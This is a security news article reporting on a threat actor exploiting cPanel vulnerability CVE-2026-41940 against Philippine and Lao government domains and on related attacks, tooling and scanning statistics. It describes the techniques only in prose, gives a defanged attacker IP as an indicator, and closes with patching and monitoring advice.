A newly identified threat actor is actively exploiting a critical cPanel vulnerability, CVE-2026-41940, to target government and military organizations across Southeast Asia. The attacks, detected on May 2, 2026, also ensnare managed service providers (MSPs) and hosting providers in various global locations, indicating a broad opportunistic campaign by this emerging adversary.
The exploitation of CVE-2026-41940, a severe flaw allowing for authentication bypass and elevated control of cPanel and WebHost Manager (WHM), is being carried out using publicly available proof-of-concept exploits. Initial targeting has focused on government and military domains in the Philippines (*.mil.ph and *.ph) and Laos (*.gov.la), with attacks originating from the IP address 95.111.250[.]175.
Emerging Threat Actor Exploits cPanel Vulnerability
The threat actor’s activity, as reported by Ctrl-Alt-Intel, demonstrates a multi-pronged approach to cyber intrusion. Prior to focusing on the cPanel vulnerability, the adversary utilized a distinct exploit chain against an Indonesian defense sector training portal. This earlier attack involved a combination of authenticated SQL injection and remote code execution, suggesting the actor already possessed valid credentials for that specific target.
Details of the Indonesian portal attack reveal a sophisticated bypass of security measures. The custom exploit script reportedly used hard-coded credentials and circumvented the portal’s CAPTCHA by extracting the expected value from server-issued session cookies, rather than completing the challenge itself. This allowed the actor to proceed directly to the document-management functions of the portal.
Once authenticated and past the CAPTCHA, the attacker targeted a vulnerable parameter within the document-saving function. The exploit script injected SQL into this field during the submission to the document-save endpoint, a clear indicator of an SQL injection attack designed to compromise the portal’s defenses.
The threat actor is leveraging the AdapdixC2 command-and-control (C2) framework to maintain remote access over compromised endpoints. Furthermore, tools such as OpenVPN and Ligolo are being employed to establish persistent access pathways into the internal networks of their victims. This infrastructure is key to their ability to operate undetected and conduct further operations.
Ctrl-Alt-Intel’s analysis indicates that the threat actor successfully established a robust access layer. This was achieved through a combination of OpenVPN, Ligolo, and systemd persistence mechanisms. This established presence then allowed the actor to pivot into internal networks, leading to the exfiltration of a significant volume of documents related to the Chinese railway sector.
Broader Exploitation of CVE-2026-41940
The emergence of this new threat actor exploiting CVE-2026-41940 is occurring alongside broader weaponization of the vulnerability. Censys has reported that multiple third-party actors began exploiting the cPanel flaw within 24 hours of its public disclosure. These other actors have deployed Mirai botnet variants and a ransomware strain known as Sorry, highlighting the widespread impact of this critical vulnerability.
Data from the Shadowserver Foundation provides further insight into the scale of scanning activity. On April 30, 2026, approximately 44,000 IP addresses, likely compromised via CVE-2026-41940, were observed engaging in scanning and brute-force attacks against honeypots. While this number has since decreased to 3,540 as of May 3, it underscores the rapid adoption of the vulnerability by various malicious actors.
The identity and motivations behind this specific threat actor remain unknown. However, the coordinated exploitation of the cPanel vulnerability by multiple entities signals a significant, ongoing threat to organizations relying on cPanel for web hosting and management. The continued use of sophisticated techniques, including custom exploits and robust C2 frameworks, suggests a well-resourced and determined adversary.
Moving forward, organizations using cPanel and WHM are strongly advised to apply the latest security patches immediately to mitigate the risks associated with CVE-2026-41940. Continuous monitoring of network traffic for anomalous activity and the implementation of multi-factor authentication remain crucial defenses against such evolving threats. The cybersecurity community will be closely watching for further activity from this emerging threat actor and any potential attribution.